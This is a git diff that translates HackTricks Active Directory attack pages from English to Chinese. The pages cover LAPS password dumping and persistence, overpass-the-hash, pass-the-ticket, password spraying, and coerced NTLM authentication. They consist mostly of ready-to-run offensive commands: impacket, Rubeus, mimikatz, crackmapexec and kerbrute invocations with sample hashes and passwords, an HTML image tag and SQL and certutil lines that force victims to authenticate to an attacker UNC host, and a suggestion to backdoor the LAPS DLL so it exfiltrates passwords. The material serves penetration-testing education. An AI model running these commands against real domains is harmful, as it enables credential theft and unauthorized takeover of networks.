+您可以从 `\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol` **下载原始 LAPS 策略**，然后使用 [**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser) 包中的 **`Parse-PolFile`** 将此文件转换为人类可读的格式。
 
+此外，如果在我们可以访问的机器上安装了 **本地 LAPS PowerShell cmdlets**，也可以使用它们：
 ```powershell
 Get-Command *AdmPwd*
 
@@ -53,9 +50,7 @@ Find-AdmPwdExtendedRights -Identity Workstations | fl
 # Read the password
 Get-AdmPwdPassword -ComputerName wkstn-2 | fl
 ```
-
-**PowerView** can also be used to find out **who can read the password and read it**:
-
+**PowerView** 还可以用来找出 **谁可以读取密码并读取它**：
 ```powershell
 # Find the principals that have ReadPropery on ms-Mcs-AdmPwd
 Get-AdmPwdPassword -ComputerName wkstn-2 | fl
@@ -63,13 +58,11 @@ Get-AdmPwdPassword -ComputerName wkstn-2 | fl
 # Read the password
 Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd
 ```
-
 ### LAPSToolkit
 
-The [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) facilitates the enumeration of LAPS this with several functions.\
-One is parsing **`ExtendedRights`** for **all computers with LAPS enabled.** This will show **groups** specifically **delegated to read LAPS passwords**, which are often users in protected groups.\
-An **account** that has **joined a computer** to a domain receives `All Extended Rights` over that host, and this right gives the **account** the ability to **read passwords**. Enumeration may show a user account that can read the LAPS password on a host. This can help us **target specific AD users** who can read LAPS passwords.
-
+[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) 通过多个功能促进了 LAPS 的枚举。\
+其中之一是解析 **`ExtendedRights`** 以获取 **所有启用 LAPS 的计算机。** 这将显示 **专门被委派读取 LAPS 密码的组，** 这些组通常是受保护组中的用户。\
+一个 **已将计算机** 加入域的 **帐户** 在该主机上获得 `All Extended Rights`，而这个权限赋予 **帐户** 读取 **密码** 的能力。枚举可能会显示一个可以在主机上读取 LAPS 密码的用户帐户。这可以帮助我们 **针对特定的 AD 用户**，他们可以读取 LAPS 密码。
 ```powershell
 # Get groups that can read passwords
 Find-LAPSDelegatedGroups
@@ -93,19 +86,15 @@ ComputerName                Password       Expiration
 ------------                --------       ----------
 DC01.DOMAIN_NAME.LOCAL      j&gR+A(s976Rf% 12/10/2022 13:24:41
 ```
+## **通过 Crackmapexec 转储 LAPS 密码**
 
-## **Dumping LAPS Passwords With Crackmapexec**
-
-If there is no access to a powershell you can abuse this privilege remotely through LDAP by using
-
+如果无法访问 PowerShell，您可以通过 LDAP 远程滥用此权限。
 ```
 crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
 ```
+这将转储用户可以读取的所有密码，使您能够以不同的用户获得更好的立足点。
 
-This will dump all the passwords that the user can read, allowing you to get a better foothold with a different user.
-
-## ** Using LAPS Password **
-
+## ** 使用 LAPS 密码 **
 ```
 xfreerdp /v:192.168.1.1:3389  /u:Administrator
 Password: 2Z@Ae)7!{9#Cq
@@ -113,13 +102,11 @@ Password: 2Z@Ae)7!{9#Cq
 python psexec.py Administrator@web.example.com
 Password: 2Z@Ae)7!{9#Cq
 ```
+## **LAPS 持久性**
 
-## **LAPS Persistence**
-
-### **Expiration Date**
-
-Once admin, it's possible to **obtain the passwords** and **prevent** a machine from **updating** its **password** by **setting the expiration date into the future**.
+### **到期日期**
 
+一旦成为管理员，可以通过**将到期日期设置为未来**来**获取密码**并**防止**机器**更新**其**密码**。
 ```powershell
 # Get expiration time
 Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
@@ -128,17 +115,16 @@ Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
 ## It's needed SYSTEM on the computer
 Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
 ```
-
 > [!WARNING]
-> The password will still reset if an **admin** uses the **`Reset-AdmPwdPassword`** cmdlet; or if **Do not allow password expiration time longer than required by policy** is enabled in the LAPS GPO.
+> 如果 **admin** 使用 **`Reset-AdmPwdPassword`** cmdlet，或者在 LAPS GPO 中启用了 **Do not allow password expiration time longer than required by policy**，密码仍然会被重置。
 
-### Backdoor
+### 后门
 
-The original source code for LAPS can be found [here](https://github.com/GreyCorbel/admpwd), therefore it's possible to put a backdoor in the code (inside the `Get-AdmPwdPassword` method in `Main/AdmPwd.PS/Main.cs` for example) that will somehow **exfiltrate new passwords or store them somewhere**.
+LAPS 的原始源代码可以在 [这里](https://github.com/GreyCorbel/admpwd) 找到，因此可以在代码中放置一个后门（例如在 `Main/AdmPwd.PS/Main.cs` 中的 `Get-AdmPwdPassword` 方法内），以某种方式 **提取新密码或将其存储在某处**。
 
-Then, just compile the new `AdmPwd.PS.dll` and upload it to the machine in `C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll` (and change the modification time).
+然后，只需编译新的 `AdmPwd.PS.dll` 并将其上传到机器中的 `C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll`（并更改修改时间）。
 
-## References
+## 参考
 
 - [https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/](https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/)
 
@@ -147,4 +133,3 @@ Then, just compile the new `AdmPwd.PS.dll` and upload it to the machine in `C:\T
 {% embed url="https://websec.nl/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md b/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
index f2461c9c7..d6e503d54 100644
--- a/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
+++ b/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
@@ -8,38 +8,32 @@
 
 ## Overpass The Hash/Pass The Key (PTK)
 
-The **Overpass The Hash/Pass The Key (PTK)** attack is designed for environments where the traditional NTLM protocol is restricted, and Kerberos authentication takes precedence. This attack leverages the NTLM hash or AES keys of a user to solicit Kerberos tickets, enabling unauthorized access to resources within a network.
+**Overpass The Hash/Pass The Key (PTK)** 攻击旨在传统 NTLM 协议受到限制且 Kerberos 认证优先的环境中。此攻击利用用户的 NTLM 哈希或 AES 密钥来请求 Kerberos 票证，从而实现对网络内资源的未经授权访问。
 
-To execute this attack, the initial step involves acquiring the NTLM hash or password of the targeted user's account. Upon securing this information, a Ticket Granting Ticket (TGT) for the account can be obtained, allowing the attacker to access services or machines to which the user has permissions.
-
-The process can be initiated with the following commands:
+要执行此攻击，第一步涉及获取目标用户帐户的 NTLM 哈希或密码。在获取此信息后，可以为该帐户获取票证授予票证 (TGT)，允许攻击者访问用户拥有权限的服务或机器。
 
+该过程可以通过以下命令启动：
 ```bash
 python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
 export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
 python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
 ```
+对于需要 AES256 的场景，可以使用 `-aesKey [AES key]` 选项。此外，获取的票证可以与各种工具一起使用，包括 smbexec.py 或 wmiexec.py，从而扩大攻击范围。
 
-For scenarios necessitating AES256, the `-aesKey [AES key]` option can be utilized. Moreover, the acquired ticket might be employed with various tools, including smbexec.py or wmiexec.py, broadening the scope of the attack.
-
-Encountered issues such as _PyAsn1Error_ or _KDC cannot find the name_ are typically resolved by updating the Impacket library or using the hostname instead of the IP address, ensuring compatibility with the Kerberos KDC.
-
-An alternative command sequence using Rubeus.exe demonstrates another facet of this technique:
+遇到的问题，如 _PyAsn1Error_ 或 _KDC cannot find the name_，通常通过更新 Impacket 库或使用主机名而不是 IP 地址来解决，以确保与 Kerberos KDC 的兼容性。
 
+使用 Rubeus.exe 的替代命令序列展示了该技术的另一个方面：
 ```bash
 .\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
 .\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
 ```
+该方法与**Pass the Key**方法相似，重点在于直接控制和利用票证进行身份验证。需要注意的是，TGT请求的启动会触发事件`4768: A Kerberos authentication ticket (TGT) was requested`，这表明默认使用RC4-HMAC，尽管现代Windows系统更倾向于使用AES256。
 
-This method mirrors the **Pass the Key** approach, with a focus on commandeering and utilizing the ticket directly for authentication purposes. It's crucial to note that the initiation of a TGT request triggers event `4768: A Kerberos authentication ticket (TGT) was requested`, signifying an RC4-HMAC usage by default, though modern Windows systems prefer AES256.
-
-To conform to operational security and use AES256, the following command can be applied:
-
+为了符合操作安全并使用AES256，可以应用以下命令：
 ```bash
 .\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec
 ```
-
-## References
+## 参考
 
 - [https://www.tarlogic.com/es/blog/como-atacar-kerberos/](https://www.tarlogic.com/es/blog/como-atacar-kerberos/)
 
@@ -48,4 +42,3 @@ To conform to operational security and use AES256, the following command can be
 {% embed url="https://websec.nl/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/pass-the-ticket.md b/src/windows-hardening/active-directory-methodology/pass-the-ticket.md
index 4a5483d48..046cfddaf 100644
--- a/src/windows-hardening/active-directory-methodology/pass-the-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/pass-the-ticket.md
@@ -5,24 +5,23 @@
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pass-the-ticket) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pass-the-ticket) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
 
 ## Pass The Ticket (PTT)
 
-In the **Pass The Ticket (PTT)** attack method, attackers **steal a user's authentication ticket** instead of their password or hash values. This stolen ticket is then used to **impersonate the user**, gaining unauthorized access to resources and services within a network.
+在 **Pass The Ticket (PTT)** 攻击方法中，攻击者 **窃取用户的认证票证**，而不是他们的密码或哈希值。然后使用这个被窃取的票证来 **冒充用户**，获得对网络内资源和服务的未经授权访问。
 
-**Read**:
+**阅读**：
 
-- [Harvesting tickets from Windows](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md)
-- [Harvesting tickets from Linux](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md)
+- [从 Windows 收集票证](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md)
+- [从 Linux 收集票证](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md)
 
-### **Swaping Linux and Windows tickets between platforms**
-
-The [**ticket_converter**](https://github.com/Zer1t0/ticket_converter) tool converts ticket formats using just the ticket itself and an output file.
+### **在平台之间交换 Linux 和 Windows 票证**
 
+[**ticket_converter**](https://github.com/Zer1t0/ticket_converter) 工具仅使用票证本身和输出文件来转换票证格式。
 ```bash
 python ticket_converter.py velociraptor.ccache velociraptor.kirbi
 Converting ccache => kirbi
@@ -30,11 +29,9 @@ Converting ccache => kirbi
 python ticket_converter.py velociraptor.kirbi velociraptor.ccache
 Converting kirbi => ccache
 ```
+在Windows中可以使用[Kekeo](https://github.com/gentilkiwi/kekeo)。
 
-In Windows [Kekeo](https://github.com/gentilkiwi/kekeo) can be used.
-
-### Pass The Ticket Attack
-
+### Pass The Ticket攻击
 ```bash:Linux
 export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
 python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass
@@ -47,18 +44,16 @@ mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.k
 klist #List tickets in cache to cehck that mimikatz has loaded the ticket
 .\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
 ```
-
-## References
+## 参考文献
 
 - [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
 
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pass-the-ticket) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pass-the-ticket) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/password-spraying.md b/src/windows-hardening/active-directory-methodology/password-spraying.md
index f7d77f596..d7ca23555 100644
--- a/src/windows-hardening/active-directory-methodology/password-spraying.md
+++ b/src/windows-hardening/active-directory-methodology/password-spraying.md
@@ -1,26 +1,25 @@
-# Password Spraying / Brute Force
+# 密码喷洒 / 暴力破解
 
 {{#include ../../banners/hacktricks-training.md}}
 
 <figure><img src="/images/image (2).png" alt=""><figcaption></figcaption></figure>
 
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
+通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证：
 
 {% embed url="https://academy.8ksec.io/" %}
 
-## **Password Spraying**
+## **密码喷洒**
 
-Once you have found several **valid usernames** you can try the most **common passwords** (keep in mind the password policy of the environment) with each of the discovered users.\
-By **default** the **minimum** **password** **length** is **7**.
+一旦您找到了几个**有效的用户名**，您可以尝试每个发现的用户的最**常见密码**（请记住环境的密码策略）。\
+默认情况下，**最小** **密码** **长度**为**7**。
 
-Lists of common usernames could also be useful: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
+常见用户名的列表也可能有用：[https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
 
-Notice that you **could lockout some accounts if you try several wrong passwords** (by default more than 10).
+请注意，如果您尝试多个错误密码，您**可能会锁定某些账户**（默认情况下超过10次）。
 
-### Get password policy
-
-If you have some user credentials or a shell as a domain user you can **get the password policy with**:
+### 获取密码策略
 
+如果您拥有一些用户凭据或作为域用户的shell，您可以**获取密码策略**：
 ```bash
 # From Linux
 crackmapexec <IP> -u 'user' -p 'password' --pass-pol
@@ -37,57 +36,45 @@ net accounts
 
 (Get-DomainPolicy)."SystemAccess" #From powerview
 ```
+### 从Linux（或所有）进行利用
 
-### Exploitation from Linux (or all)
-
-- Using **crackmapexec:**
-
+- 使用 **crackmapexec:**
 ```bash
 crackmapexec smb <IP> -u users.txt -p passwords.txt
 # Local Auth Spray (once you found some local admin pass or hash)
 ## --local-auth flag indicate to only try 1 time per machine
 crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
 ```
-
-- Using [**kerbrute**](https://github.com/ropnop/kerbrute) (Go)
-
+- 使用 [**kerbrute**](https://github.com/ropnop/kerbrute) (Go)
 ```bash
 # Password Spraying
 ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
 # Brute-Force
 ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
 ```
-
-- [**spray**](https://github.com/Greenwolf/Spray) _**(you can indicate number of attempts to avoid lockouts):**_
-
+- [**spray**](https://github.com/Greenwolf/Spray) _**(您可以指示尝试次数以避免锁定):**_
 ```bash
 spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
 ```
-
-- Using [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK
-
+- 使用 [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - 不推荐，有时无法正常工作
 ```bash
 python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
 python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
 ```
-
-- With the `scanner/smb/smb_login` module of **Metasploit**:
+- 使用 **Metasploit** 的 `scanner/smb/smb_login` 模块：
 
 ![](<../../images/image (745).png>)
 
-- Using **rpcclient**:
-
+- 使用 **rpcclient**：
 ```bash
 # https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
 for u in $(cat users.txt); do
-    rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
+rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
 done
 ```
+#### 从Windows
 
-#### From Windows
-
-- With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
-
+- 使用带有暴力模块的[Rubeus](https://github.com/Zer1t0/Rubeus)版本：
 ```bash
 # with a list of users
 .\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
@@ -95,46 +82,37 @@ done
 # check passwords for all users in current domain
 .\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
 ```
-
-- With [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (It can generate users from the domain by default and it will get the password policy from the domain and limit tries according to it):
-
+- 使用 [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1)（它可以默认从域生成用户，并将从域获取密码策略，并根据该策略限制尝试次数）：
 ```powershell
 Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
 ```
-
-- With [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)
-
+- 使用 [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)
 ```
 Invoke-SprayEmptyPassword
 ```
-
-## Brute Force
-
+## 暴力破解
 ```bash
 legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org
 ```
-
 ## Outlook Web Access
 
-There are multiples tools for p**assword spraying outlook**.
+有多种工具可以进行**密码喷洒 Outlook**。
 
-- With [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
-- with [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
-- With [Ruler](https://github.com/sensepost/ruler) (reliable!)
-- With [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
-- With [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
-
-To use any of these tools, you need a user list and a password / a small list of passwords to spray.
+- 使用 [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
+- 使用 [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
+- 使用 [Ruler](https://github.com/sensepost/ruler)（可靠！）
+- 使用 [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray)（Powershell）
+- 使用 [MailSniper](https://github.com/dafthack/MailSniper)（Powershell）
 
+要使用这些工具中的任何一个，您需要一个用户列表和一个密码/一小部分密码列表进行喷洒。
 ```bash
 ./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
-    [x] Failed: larsson:Summer2020
-    [x] Failed: cube0x0:Summer2020
-    [x] Failed: a.admin:Summer2020
-    [x] Failed: c.cube:Summer2020
-    [+] Success: s.svensson:Summer2020
+[x] Failed: larsson:Summer2020
+[x] Failed: cube0x0:Summer2020
+[x] Failed: a.admin:Summer2020
+[x] Failed: c.cube:Summer2020
+[+] Success: s.svensson:Summer2020
 ```
-
 ## Google
 
 - [https://github.com/ustayready/CredKing/blob/master/credking.py](https://github.com/ustayready/CredKing/blob/master/credking.py)
@@ -154,9 +132,8 @@ To use any of these tools, you need a user list and a password / a small list of
 
 <figure><img src="/images/image (2).png" alt=""><figcaption></figcaption></figure>
 
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
+深入了解 **移动安全**，加入 8kSec 学院。通过我们的自学课程掌握 iOS 和 Android 安全，并获得认证：
 
 {% embed url="https://academy.8ksec.io/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
index efeef58e0..793dda6d3 100644
--- a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
+++ b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
@@ -1,86 +1,71 @@
-# Force NTLM Privileged Authentication
+# 强制 NTLM 特权认证
 
 {{#include ../../banners/hacktricks-training.md}}
 
 ## SharpSystemTriggers
 
-[**SharpSystemTriggers**](https://github.com/cube0x0/SharpSystemTriggers) is a **collection** of **remote authentication triggers** coded in C# using MIDL compiler for avoiding 3rd party dependencies.
+[**SharpSystemTriggers**](https://github.com/cube0x0/SharpSystemTriggers) 是一个用 C# 编写的 **远程认证触发器** 的 **集合**，使用 MIDL 编译器以避免第三方依赖。
 
-## Spooler Service Abuse
+## Spooler 服务滥用
 
-If the _**Print Spooler**_ service is **enabled,** you can use some already known AD credentials to **request** to the Domain Controller’s print server an **update** on new print jobs and just tell it to **send the notification to some system**.\
-Note when printer send the notification to an arbitrary systems, it needs to **authenticate against** that **system**. Therefore, an attacker can make the _**Print Spooler**_ service authenticate against an arbitrary system, and the service will **use the computer account** in this authentication.
+如果 _**Print Spooler**_ 服务 **启用，** 您可以使用一些已知的 AD 凭据 **请求** 域控制器的打印服务器更新新打印作业，并告诉它 **将通知发送到某个系统**。\
+请注意，当打印机将通知发送到任意系统时，它需要 **对该系统进行认证**。因此，攻击者可以使 _**Print Spooler**_ 服务对任意系统进行认证，并且该服务将在此认证中 **使用计算机账户**。
 
-### Finding Windows Servers on the domain
-
-Using PowerShell, get a list of Windows boxes. Servers are usually priority, so lets focus there:
+### 在域中查找 Windows 服务器
 
+使用 PowerShell，获取 Windows 机器的列表。服务器通常是优先考虑的，因此我们将重点放在这里：
 ```bash
 Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
 ```
+### 查找监听的Spooler服务
 
-### Finding Spooler services listening
-
-Using a slightly modified @mysmartlogin's (Vincent Le Toux's) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket), see if the Spooler Service is listening:
-
+使用稍微修改过的@mysmartlogin（Vincent Le Toux）的 [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket)，查看Spooler服务是否在监听：
 ```bash
 . .\Get-SpoolStatus.ps1
 ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
 ```
-
-You can also use rpcdump.py on Linux and look for the MS-RPRN Protocol
-
+您还可以在 Linux 上使用 rpcdump.py 并查找 MS-RPRN 协议。
 ```bash
 rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
 ```
+### 请求服务对任意主机进行身份验证
 
-### Ask the service to authenticate against an arbitrary host
-
-You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**.**
-
+您可以从这里编译[ **SpoolSample**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**.**
 ```bash
 SpoolSample.exe <TARGET> <RESPONDERIP>
 ```
-
-or use [**3xocyte's dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) or [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) if you're on Linux
-
+或使用 [**3xocyte's dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) 或 [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) 如果你在 Linux 上
 ```bash
 python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
 printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
 ```
+### 结合不受限制的委托
 
-### Combining with Unconstrained Delegation
+如果攻击者已经攻陷了一台具有 [Unconstrained Delegation](unconstrained-delegation.md) 的计算机，攻击者可以 **使打印机对该计算机进行身份验证**。由于不受限制的委托，**打印机的计算机帐户的 TGT** 将 **保存在** 具有不受限制委托的计算机的 **内存** 中。由于攻击者已经攻陷了该主机，他将能够 **检索此票证** 并加以利用 ([Pass the Ticket](pass-the-ticket.md))。
 
-If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT** of the **computer account of the printer** will be **saved in** the **memory** of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it ([Pass the Ticket](pass-the-ticket.md)).
-
-## RCP Force authentication
+## RCP 强制身份验证
 
 {% embed url="https://github.com/p0dalirius/Coercer" %}
 
 ## PrivExchange
 
-The `PrivExchange` attack is a result of a flaw found in the **Exchange Server `PushSubscription` feature**. This feature allows the Exchange server to be forced by any domain user with a mailbox to authenticate to any client-provided host over HTTP.
+`PrivExchange` 攻击是由于 **Exchange Server `PushSubscription` 功能** 中发现的缺陷。该功能允许任何具有邮箱的域用户强制 Exchange 服务器通过 HTTP 对任何客户端提供的主机进行身份验证。
 
-By default, the **Exchange service runs as SYSTEM** and is given excessive privileges (specifically, it has **WriteDacl privileges on the domain pre-2019 Cumulative Update**). This flaw can be exploited to enable the **relaying of information to LDAP and subsequently extract the domain NTDS database**. In cases where relaying to LDAP is not possible, this flaw can still be used to relay and authenticate to other hosts within the domain. The successful exploitation of this attack grants immediate access to the Domain Admin with any authenticated domain user account.
+默认情况下，**Exchange 服务以 SYSTEM 身份运行**，并被赋予过多的权限（具体来说，它在 2019 年之前的累积更新上具有 **WriteDacl 权限**）。此缺陷可以被利用以启用 **向 LDAP 中转信息并随后提取域 NTDS 数据库**。在无法向 LDAP 中转的情况下，此缺陷仍然可以用于在域内中转和对其他主机进行身份验证。成功利用此攻击将立即授予任何经过身份验证的域用户帐户对域管理员的访问权限。
 
-## Inside Windows
+## 在 Windows 内部
 
-If you are already inside the Windows machine you can force Windows to connect to a server using privileged accounts with:
+如果您已经在 Windows 机器内部，可以使用以下命令强制 Windows 使用特权帐户连接到服务器：
 
 ### Defender MpCmdRun
-
 ```bash
 C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
 ```
-
 ### MSSQL
-
 ```sql
 EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
 ```
-
 [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
-
 ```shell
 # Issuing NTLM relay attack on the SRV01 server
 mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250
@@ -91,41 +76,33 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-
 # Issuing NTLM relay attack on the local server with custom command
 mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
 ```
-
-Or use this other technique: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce)
+或者使用这个其他技术: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce)
 
 ### Certutil
 
-It's possible to use certutil.exe lolbin (Microsoft-signed binary) to coerce NTLM authentication:
-
+可以使用 certutil.exe lolbin（微软签名的二进制文件）来强制 NTLM 认证：
 ```bash
 certutil.exe -syncwithWU  \\127.0.0.1\share
 ```
+## HTML 注入
 
-## HTML injection
-
-### Via email
-
-If you know the **email address** of the user that logs inside a machine you want to compromise, you could just send him an **email with a 1x1 image** such as
+### 通过电子邮件
 
+如果您知道要攻击的机器上登录用户的 **电子邮件地址**，您可以直接向他发送一封 **带有 1x1 图像** 的电子邮件，例如
 ```html
 <img src="\\10.10.17.231\test.ico" height="1" width="1" />
 ```
-
-and when he opens it, he will try to authenticate.
+当他打开它时，他会尝试进行身份验证。
 
 ### MitM
 
-If you can perform a MitM attack to a computer and inject HTML in a page he will visualize you could try injecting an image like the following in the page:
-
+如果你可以对一台计算机执行MitM攻击并在他可视化的页面中注入HTML，你可以尝试在页面中注入如下图像：
 ```html
 <img src="\\10.10.17.231\test.ico" height="1" width="1" />
 ```
+## 破解 NTLMv1
 
-## Cracking NTLMv1
-
-If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/#ntlmv1-attack).\
-&#xNAN;_&#x52;emember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
